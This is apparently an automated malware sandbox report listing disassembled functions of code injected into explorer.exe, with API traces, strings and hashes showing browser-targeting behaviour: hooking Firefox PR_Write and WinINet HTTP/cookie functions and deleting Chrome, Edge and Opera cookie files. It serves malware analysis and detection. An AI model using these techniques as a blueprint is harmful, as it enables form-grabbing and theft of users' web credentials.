Function 00661ECE Relevance: 12.1, APIs: 8, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.SHLWAPI(?,006631D8,00000000,007874B8), ref: 00661EE4
RtlMoveMemory.NTDLL(?,?,00000000), ref: 00661F08
RtlMoveMemory.NTDLL(?,?,00000100), ref: 00661F22
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00661F31
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00661F44
StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00661F57
lstrlen.KERNEL32(?,?,00000000), ref: 00661F64
lstrlen.KERNEL32(?,?,?,00000000), ref: 00661F9D

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: MemoryMovelstrlen
String ID:
API String ID: 456560858-0
Opcode ID: d6bf339a257f7588ee98439fcea14f8211f451a0b39ef6cd38eba0888bc89616
Instruction ID: 90c404f9b3ca96d4b018c0210f54d5a80d525065047604d428bc08076a004a16
Opcode Fuzzy Hash: d6bf339a257f7588ee98439fcea14f8211f451a0b39ef6cd38eba0888bc89616
Instruction Fuzzy Hash: 0D21C872504319AAD730EE64DC85EEB77EE9B87340F094D26F940C7211D739D94E86A2

Function 00661E44 Relevance: 7.6, APIs: 5, Instructions: 81
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,00661BF4), ref: 00661E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00661BF4), ref: 00661E69
lstrcmpiA.KERNEL32(?,0078845C), ref: 00661E81
lstrlen.KERNEL32(?,00000000), ref: 00662699
RtlMoveMemory.NTDLL(0078845C,?,00000000), ref: 006626A2

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: 0c6720ec125262a72eef41c1c0a62d3c2fc1ae01d10e1d4042509a17e07b3a2b
Instruction ID: 4f135fe64b634edc6ded3c1225de0598a18904a5b0fa7cbcd629c4ce9f6e71b9
Opcode Fuzzy Hash: 0c6720ec125262a72eef41c1c0a62d3c2fc1ae01d10e1d4042509a17e07b3a2b
Instruction Fuzzy Hash: D921F6B6A006205FD7109F24EC849BA77AFEF8A311B14042EFC15CB341D7B2D90687A1

Function 00661E3E Relevance: 7.6, APIs: 5, Instructions: 76
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,00661BF4), ref: 00661E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00661BF4), ref: 00661E69
lstrcmpiA.KERNEL32(?,0078845C), ref: 00661E81
lstrlen.KERNEL32(?,00000000), ref: 00662699
RtlMoveMemory.NTDLL(0078845C,?,00000000), ref: 006626A2

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: 2f8bf426c1f4ffcf83e5dfa97856cec85791a1108cd402b97d93055471d02434
Instruction ID: 39ea203c930d5e8d9e8c284195d47034c925690dc78c1ac48e9b2e7d2676b12f
Opcode Fuzzy Hash: 2f8bf426c1f4ffcf83e5dfa97856cec85791a1108cd402b97d93055471d02434
Instruction Fuzzy Hash: 3521C376A006219FD710DF24EC849AA7BEFEF8A314B04046AEC55DB351C7B2D90A87A1

Function 00662013 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 58
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000000,00000208,00787116,00661FDE,?,?,00000000,00000001,00000000,00000000,00000000,00661186), ref: 0066202A
lstrcat.KERNEL32(00000002,00787143), ref: 0066205C
lstrcat.KERNEL32(0000004E,?), ref: 00662078

Strings

Hqx, xrefs: 0066203E

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: lstrcat$lstrlen
String ID: Hqx
API String ID: 751011610-3912414419
Opcode ID: 7e5fc4263516c56c0cf4b4d8bcee61cd3b6494798a924c1c03afda3e1c8204fd
Instruction ID: bec311f852ad9083b224a45c06ae29005681fdd05213bcc45a501cc99a11112b
Opcode Fuzzy Hash: 7e5fc4263516c56c0cf4b4d8bcee61cd3b6494798a924c1c03afda3e1c8204fd
Instruction Fuzzy Hash: 0711A3726043119FC728CF18D894A6B77EAEF88755F00062EF94987346E775EC04CBA4

Function 006618F4 Relevance: 6.1, APIs: 4, Instructions: 51
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0066190C
GetFileSize.KERNEL32(00000000,00000000), ref: 0066191C
CloseHandle.KERNEL32(00000000), ref: 00661966

Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00661941

Memory Dump Source

Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_661000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 29cd7a382dc0e0c8bb8c357e20c31d2f765ca23b02db43a67f4a75dc08ae2e2b
Instruction ID: fce72f2eb23353e19cae09029d595932207d396d4989cd7232d7061fc7907cc1
Opcode Fuzzy Hash: 29cd7a382dc0e0c8bb8c357e20c31d2f765ca23b02db43a67f4a75dc08ae2e2b
Instruction Fuzzy Hash: F801DB323002247BD3202B76DC58EAF755FDB877A4F05032DF556A63D1DE615D0941B0

Analysis Process: explorer.exePID: 7100, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	224
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03043862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 03043886
GetCurrentProcessId.KERNEL32(00000001), ref: 0304389B
wsprintfA.USER32 ref: 030438B6

Part of subcall function 0304118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030411A9
Part of subcall function 0304118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030411C1
Part of subcall function 0304118D: lstrlen.KERNEL32(?,00000000), ref: 030411C9
Part of subcall function 0304118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030411D4
Part of subcall function 0304118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030411EE
Part of subcall function 0304118D: wsprintfA.USER32 ref: 03041205
Part of subcall function 0304118D: CryptDestroyHash.ADVAPI32(?), ref: 0304121E
Part of subcall function 0304118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 03041228

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 030438CD
GetLastError.KERNEL32 ref: 030438D3
RtlInitializeCriticalSection.NTDLL(03046038), ref: 030438F3
PathFindFileNameA.SHLWAPI(?), ref: 030438FA
lstrcat.KERNEL32(03045CDE,00000000), ref: 03043910
Sleep.KERNEL32(000001F4), ref: 0304392A
lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0304393C
GetCommandLineW.KERNEL32(?), ref: 0304394F
GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0304397E
GetProcAddress.KERNEL32(00000000), ref: 03043987
GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 030439AF
GetProcAddress.KERNEL32(00000000), ref: 030439B2
GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 030439C4
GetProcAddress.KERNEL32(00000000), ref: 030439C7
GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 030439E1
GetProcAddress.KERNEL32(00000000), ref: 030439E4
GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 030439EC
GetProcAddress.KERNEL32(00000000), ref: 030439EF
lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 03043A6D
GetCommandLineA.KERNEL32(NetworkService), ref: 03043A78
StrStrIA.SHLWAPI(00000000), ref: 03043A7B
lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 03043A8E
GetCommandLineA.KERNEL32(NetworkService), ref: 03043A9D
StrStrIA.SHLWAPI(00000000), ref: 03043AA0
GetModuleHandleA.KERNEL32(opera.dll), ref: 03043ABF
GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 03043ACC
CommandLineToArgvW.SHELL32(00000000), ref: 03043956

Part of subcall function 030416C7: GetCurrentProcessId.KERNEL32 ref: 030416D9
Part of subcall function 030416C7: GetCurrentThreadId.KERNEL32 ref: 030416E1
Part of subcall function 030416C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030416F1
Part of subcall function 030416C7: Thread32First.KERNEL32(00000000,0000001C), ref: 030416FF
Part of subcall function 030416C7: CloseHandle.KERNEL32(00000000), ref: 03041758

lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 03043A10
lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 03043A20
lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 03043A30
GetCommandLineA.KERNEL32(NetworkService), ref: 03043A47
StrStrIA.SHLWAPI(00000000), ref: 03043A4A
GetModuleHandleA.KERNEL32(chrome.dll), ref: 03043A5F
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 03043B2C
GetProcAddress.KERNEL32(00000000), ref: 03043B35
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 03043B52
GetProcAddress.KERNEL32(00000000), ref: 03043B55
GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 03043B72
GetProcAddress.KERNEL32(00000000), ref: 03043B75
GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 03043B99
GetProcAddress.KERNEL32(00000000), ref: 03043B9C
GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 03043BA9
GetProcAddress.KERNEL32(00000000), ref: 03043BAC
GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 03043BB9
GetProcAddress.KERNEL32(00000000), ref: 03043BBC

Part of subcall function 03041C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 03041C42

RtlExitUserThread.NTDLL(00000000), ref: 03043BD9
wsprintfA.USER32 ref: 03043C1F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03043C69
Process32First.KERNEL32(00000000,?), ref: 03043C88
CloseHandle.KERNELBASE(00000000), ref: 03043D77
Sleep.KERNELBASE(000003E8), ref: 03043D82

Strings

HttpSendRequestW, xrefs: 03043B4C
nss3.dll, xrefs: 030439B9, 030439C3, 030439EB
HttpQueryInfoA, xrefs: 03043B93
fgclearcookies, xrefs: 03043C3D
NetworkService, xrefs: 03043A42, 03043A73, 03043A98
opera.dll, xrefs: 03043AB0
%s%d%d%d, xrefs: 030438B0
chrome.exe, xrefs: 03043A67
VirtualQuery, xrefs: 03043974
PR_Write, xrefs: 030439D6, 030439DB, 030439EA
msedge.exe, xrefs: 03043A2A
microsoftedgecp.exe, xrefs: 03043A1A
InternetGetCookieA, xrefs: 03043BAE
InternetWriteFile, xrefs: 03043B6C
firefox.exe, xrefs: 03043936
HttpSendRequestA, xrefs: 03043B26
iexplore.exe, xrefs: 03043A0A
wininet.dll, xrefs: 03043B21, 03043B2B, 03043B51, 03043B71, 03043B98, 03043BA3, 03043BB3
opera.exe, xrefs: 03043A88
InternetQueryOptionA, xrefs: 03043B9E
opera_browser.dll, xrefs: 03043AC7
PR_GetDescType, xrefs: 030439A4, 030439A9, 030439C2
msedge.dll, xrefs: 03043A50
kernel32.dll, xrefs: 03043979
chrome.dll, xrefs: 03043A81
%s%s, xrefs: 03043C19
nspr4.dll, xrefs: 030439AA, 030439DC

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
API String ID: 2480436012-2618538661
Opcode ID: c42a15d242453adbe8ac9a66f9f65f7801c29b03dd8a5e48c99d960b57d0bcbb
Instruction ID: 81d6a8088f33d7c7e845b54962072e2b66ef7fb01c1f9e40375d7b0afb97bb8e
Opcode Fuzzy Hash: c42a15d242453adbe8ac9a66f9f65f7801c29b03dd8a5e48c99d960b57d0bcbb
Instruction Fuzzy Hash: 37A127F8A43318ABC714FB72AD09F6F7ADC9F81640B050578E911DB145EB79CB118AA1

Function 030415BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 030415EB
FindFirstFileW.KERNELBASE(00000000,?), ref: 030415F7
lstrcmpiW.KERNEL32(?,030441C8), ref: 03041623
lstrcmpiW.KERNEL32(?,030441CC), ref: 03041633
PathCombineW.SHLWAPI(00000000,?,?), ref: 0304164C
PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 03041661
PathCombineW.SHLWAPI(00000000,?,?), ref: 0304167E
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0304169C
FindClose.KERNELBASE(00000000), ref: 030416AB

Strings

*.*, xrefs: 030415DE
Cookies*, xrefs: 0304165F

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
String ID: *.*$Cookies*
API String ID: 4256701249-3228320225
Opcode ID: fc17c5c3a251b4d8ca4bacc2d720c02d462a668f92f588e2144a51ab01cd6c2f
Instruction ID: afb8e797844915df2fea2832651a488818edeb5411a01dde77e1fa5b84bf088a
Opcode Fuzzy Hash: fc17c5c3a251b4d8ca4bacc2d720c02d462a668f92f588e2144a51ab01cd6c2f
Instruction Fuzzy Hash: 3C21A5F42063059BD314EA66A984B7F7BECAB88285F080539F941D7241DB78DB4446A2

Function 030414D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 030413FE: wsprintfW.USER32 ref: 0304142A
Part of subcall function 030413FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 03041439
Part of subcall function 030413FE: wsprintfW.USER32 ref: 03041476
Part of subcall function 030413FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0304149C
Part of subcall function 030413FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 030414AF
Part of subcall function 030413FE: FindClose.KERNELBASE(00000000), ref: 030414BA

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

wsprintfW.USER32 ref: 0304150D
FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
wsprintfW.USER32 ref: 03041557
SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
DeleteFileW.KERNELBASE(00000000), ref: 03041571
FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
FindClose.KERNELBASE(00000000), ref: 0304158F

Strings

%s%s, xrefs: 03041503, 03041551
*.*, xrefs: 030414FB

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$*.*
API String ID: 2055899612-705776850
Opcode ID: 27c883c087221bfdb8ee531f76d3cbc9e5181e8dd9133b7a8ff67b6260764128
Instruction ID: c93bf9b2e8e56afc53682105c6129ca4685e6e9e272aacb4fdf83a05565c47fc
Opcode Fuzzy Hash: 27c883c087221bfdb8ee531f76d3cbc9e5181e8dd9133b7a8ff67b6260764128
Instruction Fuzzy Hash: F6115CF52023005BD314FB7A9C48BAF7BDCDFC5255F000538FD5286292DB788B9482A6

Function 030413FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

wsprintfW.USER32 ref: 0304142A
FindFirstFileW.KERNELBASE(00000000,?), ref: 03041439
wsprintfW.USER32 ref: 03041476

Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F

RemoveDirectoryW.KERNELBASE(00000000), ref: 0304149C
FindNextFileW.KERNELBASE(00000000,00000010), ref: 030414AF
FindClose.KERNELBASE(00000000), ref: 030414BA

Strings

%s%s, xrefs: 03041420
%s%s\, xrefs: 03041470
*.*, xrefs: 03041418

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$%s%s\$*.*
API String ID: 2055899612-4093207852
Opcode ID: cd6753f5e0708f79a780b18dacc45dd4d7125bb3f60f65ec6c9eb315d09f8fe1
Instruction ID: f6d1b94b05c5f3abc1bbcac6052229c18d598ef33554ae85a03b43f79fdd76c8
Opcode Fuzzy Hash: cd6753f5e0708f79a780b18dacc45dd4d7125bb3f60f65ec6c9eb315d09f8fe1
Instruction Fuzzy Hash: A11102B42063406BD318FB6AEC48BBFBADCEFC5245F04053CF95182192DB794A888662

Function 03043D8D Relevance: 4.5, APIs: 3, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03043DAF
RtlMoveMemory.NTDLL(00000000,?,?), ref: 03043DE2
NtUnmapViewOfSection.NTDLL(000000FF), ref: 03043DEB

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
String ID:
API String ID: 4050682147-0
Opcode ID: 76ac08b3ff1dddaae715170c7de6e803f0f88334adc59ee7e5cddeffe73495f5
Instruction ID: 70a0446960746e4819c92d37c5f84a3ec13182e133b3c9b282fe6d07ae90fb9b
Opcode Fuzzy Hash: 76ac08b3ff1dddaae715170c7de6e803f0f88334adc59ee7e5cddeffe73495f5
Instruction Fuzzy Hash: 4B01B9FC403610ABC728FB65E548BEB7BACDB46311F0455B994158B1C4D77B8751CB60

Function 03042EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,03043CD2), ref: 03042EB4

Part of subcall function 03042E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03042EC5), ref: 03042E27
Part of subcall function 03042E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03042E52
Part of subcall function 03042E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03042E7F
Part of subcall function 03042E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03042E92

Strings

chrome.exe|opera.exe|msedge.exe, xrefs: 03042EAB

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Process$InformationQuery$Open
String ID: chrome.exe|opera.exe|msedge.exe
API String ID: 4117927671-3743313796
Opcode ID: 252b7fb23345d60ffb38140bf5386bb3d5da301efcf49c3c6eeed19b3b4b8409
Instruction ID: f87b79dc1f8a30fc71d552c75fe8300d84963ce5b46f110b8d126d133a0f39a0
Opcode Fuzzy Hash: 252b7fb23345d60ffb38140bf5386bb3d5da301efcf49c3c6eeed19b3b4b8409
Instruction Fuzzy Hash: 61D0A9B63026200B572CA57B6C09B7F94CDCACA8A230A053EF802DB200EA90CE0342A0

Function 03043709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB

Part of subcall function 03041363: lstrcmpiA.KERNEL32(?), ref: 030413A3
Part of subcall function 03041363: Process32Next.KERNEL32(00000000,00000128), ref: 030413C0

Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043731

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043752
lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043764

Part of subcall function 030415BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 030415EB
Part of subcall function 030415BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 030415F7
Part of subcall function 030415BE: lstrcmpiW.KERNEL32(?,030441C8), ref: 03041623
Part of subcall function 030415BE: lstrcmpiW.KERNEL32(?,030441CC), ref: 03041633
Part of subcall function 030415BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0304164C
Part of subcall function 030415BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0304169C
Part of subcall function 030415BE: FindClose.KERNELBASE(00000000), ref: 030416AB

RtlZeroMemory.NTDLL(00000000,00001000), ref: 0304377A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043783
lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 0304378F
RtlZeroMemory.NTDLL(00000000,00001000), ref: 030437A3
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 030437AC
lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 030437B8

Strings

\Microsoft\Edge\User Data\, xrefs: 03043789
msedge.exe, xrefs: 03043722
\Google\Chrome\User Data\, xrefs: 0304375E
opera.exe, xrefs: 03043718
\Opera Software\Opera Stable\, xrefs: 030437B2
chrome.exe, xrefs: 0304370E
Cookies*, xrefs: 03043766, 03043791, 030437BA

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
API String ID: 909495591-1175993956
Opcode ID: 3ad5e4f40560673bf08423f8d3c0f884733c976e6c3da2add5e6d7f85fb88dc5
Instruction ID: 71ad251b59958dd865c84a354e2cba4ef3d765b64e3de90394b1b48619108cd3
Opcode Fuzzy Hash: 3ad5e4f40560673bf08423f8d3c0f884733c976e6c3da2add5e6d7f85fb88dc5
Instruction Fuzzy Hash: A01102F834375836E038F2675D82FAF5589CFD5A91F000034F6456E2C1CF94AB4245AA

Function 03043BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

wsprintfA.USER32 ref: 03043C1F

Part of subcall function 03041235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0304123F
Part of subcall function 03041235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03043C33), ref: 03041251

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03043C69
Process32First.KERNEL32(00000000,?), ref: 03043C88
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03043CA1
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 03043CB1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03043CC1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03043D12
Process32Next.KERNEL32(00000000,00000128), ref: 03043D68
CloseHandle.KERNELBASE(00000000), ref: 03043D77
Sleep.KERNELBASE(000003E8), ref: 03043D82

Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155

Strings

firefox.exe, xrefs: 03043936, 03043C9B
fgclearcookies, xrefs: 03043C3D
iexplore.exe, xrefs: 03043A0A, 03043CA7
%s%s, xrefs: 03043C19
microsoftedgecp.exe, xrefs: 03043A1A, 03043CB7, 03043D08

Memory Dump Source

